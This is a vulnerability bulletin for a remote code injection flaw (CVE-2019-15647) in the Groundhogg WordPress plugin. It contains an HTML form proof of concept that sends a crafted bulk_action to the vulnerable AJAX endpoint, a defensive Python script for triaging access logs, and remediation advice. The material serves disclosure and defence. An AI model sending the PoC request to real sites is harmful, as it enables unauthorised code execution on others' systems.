SB2019082717 - Remote code execution in Groundhogg plugin for WordPress
Published: August 27, 2019 Updated: October 25, 2019
Description
This security bulletin contains information about 1 security vulnerability.
1) Code Injection (CVE-ID: CVE-2019-15647)
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to improper input validation in the "bulk_action_listener" AJAX action, reachable at "wp-admin/admin-ajax.php?action=bulk_action_listener". A remote authenticated attacker can send a specially crafted request to this endpoint and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of the vulnerable system.
PoC:
<html>
  <body>
    <form action="http://[host]/wp-admin/admin-ajax.php?action=bulk_action_listener" method="POST">
      <input type="hidden" name="bulk_action" value="do_feed_rss" />
      <input type="submit" value="Submit" />
    </form>
  </body>
</html>
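For defenders who cannot patch immediately, the request shape above gives enough to triage access logs: a POST to admin-ajax.php whose query string selects bulk_action_listener. The helper below is an added example written for this bulletin; it is not code from the vendor or the bulletin's author. It assumes an Apache/nginx "combined" log format with one extra quoted field carrying the URL-encoded POST body (a plain combined log has no body field, and such hits are reported for manual review instead), and the allowlist of expected bulk actions is a hypothetical placeholder that a site would replace with the actions it actually uses. The sample log lines are constructed.

```python
"""Triage helper for CVE-2019-15647 (added example, not from the bulletin).

Scans access-log lines for POST requests to the Groundhogg
"bulk_action_listener" AJAX action and reports ones whose bulk_action
parameter is not a value the site is known to use.

Assumptions (not stated in the bulletin):
  * log format is "combined" plus a final quoted field holding the
    URL-encoded POST body; without that field the body is unknown;
  * KNOWN_BULK_ACTIONS is a hypothetical allowlist for illustration.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
    r'(?: "(?P<body>[^"]*)")?'
)

VULN_ACTION = "bulk_action_listener"
# Hypothetical allowlist: bulk actions this site's admins legitimately trigger.
KNOWN_BULK_ACTIONS = {"delete", "export", "apply_tag"}

# Constructed sample lines: one PoC-shaped request with a logged body,
# one legitimate admin bulk action, one unrelated AJAX call, and one
# hit on the vulnerable action whose body was not logged.
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Aug/2019:10:01:12 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=bulk_action_listener HTTP/1.1" 200 512 "-" "Mozilla/5.0" '
    '"bulk_action=do_feed_rss"',
    '198.51.100.4 - - [27/Aug/2019:10:02:30 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=bulk_action_listener HTTP/1.1" 200 88 "https://example.org/wp-admin/" '
    '"Mozilla/5.0" "bulk_action=apply_tag&ids%5B%5D=12"',
    '198.51.100.4 - - [27/Aug/2019:10:03:01 +0000] "GET /wp-admin/admin-ajax.php'
    '?action=heartbeat HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Aug/2019:10:05:44 +0000] "POST /wp-admin/admin-ajax.php'
    '?action=bulk_action_listener HTTP/1.1" 200 512 "-" "curl/7.64.0"',
]


def parse_line(line):
    """Split one log line into fields; returns None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    url = urlsplit(entry["path"])
    entry["endpoint"] = url.path
    entry["query"] = parse_qs(url.query)          # e.g. {"action": ["heartbeat"]}
    entry["form"] = parse_qs(entry["body"]) if entry["body"] else {}
    return entry


def flag(entry):
    """Return a reason string if the request warrants review, else None."""
    if entry is None:
        return None
    if not entry["endpoint"].endswith("/wp-admin/admin-ajax.php"):
        return None
    if entry["query"].get("action") != [VULN_ACTION]:
        return None
    bulk = entry["form"].get("bulk_action", [None])[0]
    if bulk is None:
        # Body not logged: cannot tell a legitimate action from an attack.
        return f"{VULN_ACTION} hit without a logged body: verify manually"
    if bulk not in KNOWN_BULK_ACTIONS:
        return f"unexpected bulk_action {bulk!r} sent to {VULN_ACTION}"
    return None


def scan(lines):
    """Return (client_ip, reason) for every line that flag() reports."""
    results = []
    for entry in map(parse_line, lines):
        reason = flag(entry)
        if reason:
            results.append((entry["ip"], reason))
    return results


if __name__ == "__main__":
    for ip, reason in scan(SAMPLE_LOG):
        print(f"{ip}: {reason}")
```

Legitimate Groundhogg administration also hits this action, so a match is a triage signal rather than a verdict: correlate the client IP and session with the WordPress user that was logged in, and treat an unfamiliar bulk_action value (the PoC's do_feed_rss is a core WordPress function name, not a plugin bulk action) as the strongest indicator.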
Remediation
Install the update from the vendor's website.